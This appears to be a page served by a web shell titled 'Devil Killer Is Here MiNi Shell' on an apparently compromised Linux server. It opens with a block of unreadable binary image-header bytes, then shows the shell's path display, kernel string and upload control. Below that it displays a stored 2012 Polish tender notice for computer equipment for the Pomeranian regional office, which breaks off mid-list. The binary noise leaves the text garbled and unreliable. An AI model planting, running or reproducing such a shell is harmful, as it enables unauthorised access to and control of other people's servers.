JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121016/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121016/401570-N-2012.html

<p class="kh_header"><b>Gdańsk: DOSTAWA SPRZĘTU KOMPUTEROWEGO DLA URZĘDU MARSZAŁKOWSKIEGO WOJEWÓDZTWA POMORSKIEGO</b><br>
<b>Numer ogłoszenia: 401570 - 2012; data zamieszczenia: 16.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samorząd Województwa Pomorskiego , ul. Okopowa 21/27, 80-810 Gdańsk, woj. pomorskie, tel. 058 3261555, faks 058 3261556.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pomorskie.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA SPRZĘTU KOMPUTEROWEGO DLA URZĘDU MARSZAŁKOWSKIEGO WOJEWÓDZTWA POMORSKIEGO.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa fabrycznie nowego sprzętu komputerowego. Zamówienie zostało podzielone na siedem (7) części. Przedmiot zamówienia obejmuje dostawę dla:
Część I 
1) Zestaw komputerowy  z monitorem LCD 18,5 -  34 szt.
2) Monitor LCD 18,5 -  21 szt.
3) Monitor LCD 21,5 -  9 szt.
Część II
1) Zestaw komputerowy  z monitorem LCD 18,5 - 18 szt.
2) Zestaw komputerowy  bez monitora - 8 szt.
3) Zestaw komputerowy  z monitorem LCD 19 - 16 szt.
Część III 
1) Notebook 15,6 typ 1 - 27szt.
2) Notebook 15,6 typ 2 - 26 szt.
Część IV
1) Drukarka laserowa mono typ 1 - 1 szt.
2) Drukarka laserowa mono typ 2 - 2 szt.
3) Drukarka laserowa kolor typ 1 - 1 szt.
4) Drukarka laserowa kolor typ 2 - 5 szt.
5) Urządzenie wielofunkcyjne mono - 8 szt.
6) Urządzenie wielofunkcyjne kolor - 7 szt.
Część V 
1) Projektor typ 1 - 12 szt.
2) Projektor typ 2 - 2 szt. 
3) Projektor typ 3 - 9 szt.
4) Projektor typ 4 - 5 szt.
5) Ekran projekcyjny typ 1 - 4 szt.
6) Ekran projekcyjny typ 2 - 1 szt.
7) Ekran projekcyjny typ 3 - 5 szt.
8) Ekran projekcyjny typ 4 - 5 szt.
9) Ekran projekcyjny typ 5 - 2 szt.
Część VI 
1) Zestaw komputerowy  z monitorem LCD 19 - 18 szt.
2) Drukarka laserowa monochromatyczna A4 - 2 szt.	
3) Notebook 17,3 - 1 szt.
Część VII 
1) Serwer blade M620 - 1szt.
2) Oprogramowanie wirtualizacyjne Vmware vSphere 5 Enterprise - 2szt. 
3) Dodatkowe pamięci RAM 8GB do serwera z serii M610 - 8 szt.
4) Dodatkowe pamięci RAM 8GB do serwera z serii M710HD - 12 szt.
5) Dodatkowe licencje rozszerzające do macierzy Dell Compellent Storage -  1 kpl.
6) Dodatkowe dyski twarde 1TB do macierzy Dell Compellent Storage - 18 kpl..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.21.30.00-5, 30.23.13.00-0, 30.21.31.00-6, 30.23.21.10-8, 38.65.21.00-1, 38.65.34.00-1, 48.82.00.00-2, 30.23.31.32-5, 30.23.61.10-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 40.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Złożona oferta musi być zabezpieczona wadium obejmującym okres związania ofertą o wartości:

Część 1: 1 800  zł (słownie: tysiąc osiemset złotych)
Część 2: 2 500  zł (słownie: dwa tysiące pięćset złotych)
Część3: 2 500  zł (słownie: dwa tysiące pięćset złotych)
Część4: 400  zł (słownie: czterysta złotych)
Część5: 1 500  zł (słownie: tysiąc pięćset złotych)
Część 6: 1 500  zł (słownie: tysiąc pięćset złotych)
Część 6: 3 500  zł (słownie: trzy tysiące pięćset złotych)

2.	Wadium winno zostać wniesione przed upływem terminu składania ofert. Nie  wniesienie wadium, w tym również na przedłużony okres związania ofertą, lub wniesienie wadium po tym terminie skutkować będzie wykluczeniem wykonawcy.
3.	Wadium może być wniesione w jednej lub kilku następujących formach:
a) w pieniądzu,
b) w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy winno być poręczeniem pieniężnym,
c) w gwarancjach bankowych,
d) w gwarancjach ubezpieczeniowych,
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. 109 poz. 1158 z późniejszymi zmianami).
Wadium wnoszone w pieniądzu należy wpłacać przelewem na rachunek Urzędu Marszałkowskiego Województwa Pomorskiego w Gdańsku nr konta PEKAO S.A. O/Gdańsk, nr 76 1240 6292 1111 0010 4607 0996. W tytule należy podać: Dostawa sprzętu komputerowego dla Urzędu Marszałkowskiego Województwa Pomorskiego.  Podać numer Części przedmiotu zamówienia
Będzie ono przechowywane na rachunku bankowym Zamawiającego.	
4.	Wadium wnoszone w:
a) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej,
b) gwarancjach bankowych,
c) gwarancjach ubezpieczeniowych,
d) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. 109 poz. 1158 z późniejszymi zmianami).
Należy złożyć w opisanej kopercie wraz z ofertą, natomiast potwierdzoną za zgodność z oryginałem kserokopię, dołączyć do oferty. 

5.	Wadium wnoszone w:
a) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo -kredytowej,
b) gwarancjach bankowych,
c) gwarancjach ubezpieczeniowych,
d) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. nr 109 poz. 1158 z późniejszymi zmianami),
powinno być ważne przez okres związania ofertą.
6.	Zwrotu wadium (a w przypadku wniesienia wadium w formie pieniężnej - dyspozycję do banku) Zamawiający dokona niezwłocznie wszystkim Wykonawcom, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza:
a) po wyborze oferty najkorzystniejszej
lub
b) po unieważnieniu  postępowania o udzielenie zamówienia.
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Pzp lub pełnomocnictw, chyba że udowodni, iż wynika to z przyczyn nieleżących po jego stronie.
7.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po wniesieniu zabezpieczenia należytego wykonania umowy i jej zawarciu w sprawie zamówienia publicznego (jeśli jest wymagane).
8.	Zamawiający zwróci niezwłocznie wadium na pisemny wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania oferty.
9.	Zgodnie z art. 46 ust. 3 ustawy Pzp Zamawiający zażąda ponownego wniesienia wadium przez Wykonawcę, któremu  zwrócono wadium na podstawie art. 46 ust. 1 ustawy Pzp, jeżeli w wyniku  rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wniesie wadium w terminie określonym przez Zamawiającego.
10.	Jeżeli wadium zostanie wniesione w pieniądzu, Zamawiający zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek wskazany przez Wykonawcę.
11.	Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a) odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b)  nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
c) zawarcie umowy stanie się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia wyżej wskazanego warunku na każdą część zamówienia nastąpi na podstawie przedstawionego przez Wykonawcę oświadczenia, o którym mowa  w rozdz. VI ust.1 pkt  1 (którego wzór stanowi załącznik nr 3  do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże należyte wykonanie w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej:
dla Części 1: co najmniej 2 dostawy sprzętu komputerowego, o łącznej wartości nie mniejszej                          niż 80.000,00 zł brutto (słownie: osiemdziesiąt tysięcy złotych)
dla Części  2: co najmniej 2 dostawy sprzętu komputerowego, o łącznej wartości nie mniejszej niż 120.000,00 zł brutto (słownie: sto dwadzieścia tysięcy złotych)
dla Części 3: co najmniej 2 dostawy sprzętu komputerowego, o łącznej wartości nie mniejszej niż 110.000,00 zł brutto (słownie: sto dziesięć tysięcy złotych)
dla Części  4: co najmniej 2 dostawy sprzętu komputerowego, o łącznej wartości nie mniejszej niż 20.000,00 zł brutto (słownie: dwadzieścia tysięcy złotych)
dla Części 5: co najmniej 2 dostawy projektorów i ekranów, o łącznej wartości nie mniejszej niż 70.000,00 zł brutto (słownie: siedemdziesiąt tysięcy złotych)
dla Części 6: co najmniej 2 dostawy sprzętu komputerowego, o łącznej wartości nie mniejszej niż 70.000,00 zł brutto (słownie: siedemdziesiąt tysięcy złotych)
dla Części 7: co najmniej 2 dostawy sprzętu serwerowego, o łącznej wartości nie mniejszej niż 160.000,00 zł brutto (słownie: sto sześćdziesiąt tysięcy złotych)

Ocena spełnienia warunku nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów,                    o których mowa w rozdz. VI ust. 1 pkt  2 (wzór wykazu dostaw stanowi załącznik nr 5 do SIWZ) - na każdą Część zamówienia należy złożyć odrębny wykaz dostaw oraz oświadczenia, o którym mowa  w rozdz. VI ust.1 pkt  1 (wzór stanowi załącznik nr 3  do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia wyżej wskazanego warunku na każdą część zamówienia nastąpi na podstawie przedstawionego przez Wykonawcę oświadczenia, o którym mowa  w rozdz. VI ust.1 pkt  1 (którego wzór stanowi załącznik nr 3  do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia wyżej wskazanego warunku na każdą część zamówienia nastąpi na podstawie przedstawionego przez Wykonawcę oświadczenia, o którym mowa  w rozdz. VI ust.1 pkt  1 (którego wzór stanowi załącznik nr 3  do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena wykazania spełnienia warunku nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów, o których mowa w rozdz. VI ust. 1 pkt  1 (którego wzór stanowi załącznik nr 3  do SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający, stosownie do treści art. 144 ust.1 ustawy Prawo Zamówień Publicznych, przewiduje następujące możliwości dokonywania zmian postanowień niniejszej umowy:
1. )zmiana terminu realizacji zamówienia,
2.) zmiana warunków i terminów płatności,
3. )zmiana parametrów technicznych przedmiotu Umowy, jeśli przyczyni się to do poprawy jakości zamówienia, przy czym zmiana ta nie spowoduje zwiększenia kosztów realizacji zamówienia.
2.Zmiany, o których mowa w ust. 1 mogą nastąpić jedynie w uzasadnionych przypadkach,  w szczególności:               
1) w przypadku wystąpienia siły wyższej. Pod pojęciem siły wyższej Zamawiający rozumie okoliczności, które pomimo zachowania należytej staranności są nieprzewidywalne oraz, którym nie można zapobiec lub przeciwstawić się skutecznie. O braku możliwości dotrzymania terminu Wykonawca obowiązany jest niezwłocznie powiadomić Zamawiającego, określając jednocześnie nowy termin realizacji zamówienia, 
2)	gdy zmiany te  są korzystne dla Zamawiającego.
3.	Zamawiający, dopuszcza możliwość zmiany terminu realizacji zamówienia na pisemny wniosek Wykonawcy, o ile konieczność wprowadzenia takiej zmiany jest następstwem szczególnych okoliczności nie leżących po stronie Wykonawcy. Ocena, czy zachodzą szczególne okoliczności, oraz czas przedłużenia terminu należy wyłącznie do Zamawiającego.
1)w przypadku wystąpienia siły wyższej Pod pojęciem siły wyższej Zamawiający rozumie okoliczności, które pomimo zachowania należytej staranności są nieprzewidywalne oraz, którym nie można zapobiec lub przeciwstawić się skutecznie. O braku możliwości dotrzymania terminu Wykonawca obowiązany jest niezwłocznie powiadomić Zamawiającego, określając jednocześnie nowy termin realizacji zamówienia, 
2)	gdy zmiany te  są korzystne dla Zamawiającego.
 Zamawiający, dopuszcza możliwość zmiany terminu realizacji zamówienia na pisemny wniosek Wykonawcy, o ile konieczność wprowadzenia takiej zmiany jest następstwem szczególnych okoliczności nie leżących po stronie Wykonawcy. Ocena, czy zachodzą szczególne okoliczności, oraz czas przedłużenia terminu należy wyłącznie do Zamawiającego.Wszelkie zmiany niniejszej umowy wymagają formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.pomorskie.eu/pl/bip/umwp/zamowienia/zamowienia<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Marszałkowski  Województwa Pomorskiego
ul. Okopowa 21/27, 80-810 Gdańsk
pok. 133H.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.10.2012 godzina 11:30, miejsce: Kancelaria Ogólna (pok. 4a)
Urzędu Marszałkowskiego Województwa Pomorskiego
ul. Okopowa 21/27, 80-810 Gdańsk.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Europejski Fundusz Społeczny oraz Europejski Fundusz Rozwoju Regionalnego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa sprzętu komputerowego dla Urzędu Marszałkowskiego Województwa Pomorskiego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Zestaw komputerowy  z monitorem LCD 18,5 -  34 szt.
2) Monitor LCD 18,5 -  21 szt.
3) Monitor LCD 21,5 -  9 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.21.30.00-5, 30.23.13.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa sprzętu komputerowego dla Urzędu Marszałkowskiego Województwa Pomorskiego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Zestaw komputerowy  z monitorem LCD 18,5 - 18 szt.
2) Zestaw komputerowy  bez monitora - 8 szt.
3) Zestaw komputerowy  z monitorem LCD 19 - 16 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.13.00-0, 30.21.30.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa sprzętu komputerowego dla Urzędu Marszałkowskiego Województwa Pomorskiego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Notebook 15,6 typ 1 - 27szt.
2) Notebook 15,6 typ 2 - 26 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.21.31.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa sprzętu komputerowego dla Urzędu Marszałkowskiego Województwa Pomorskiego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Drukarka laserowa mono typ 1 - 1 szt.
2) Drukarka laserowa mono typ 2 - 2 szt.
3) Drukarka laserowa kolor typ 1 - 1 szt.
4) Drukarka laserowa kolor typ 2 - 5 szt.
5) Urządzenie wielofunkcyjne mono - 8 szt.
6) Urządzenie wielofunkcyjne kolor - 7 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.21.10-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa sprzętu komputerowego dla Urzędu Marszałkowskiego Województwa Pomorskiego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Projektor typ 1 - 12 szt.
2) Projektor typ 2 - 2 szt. 
3) Projektor typ 3 - 9 szt.
4) Projektor typ 4 - 5 szt.
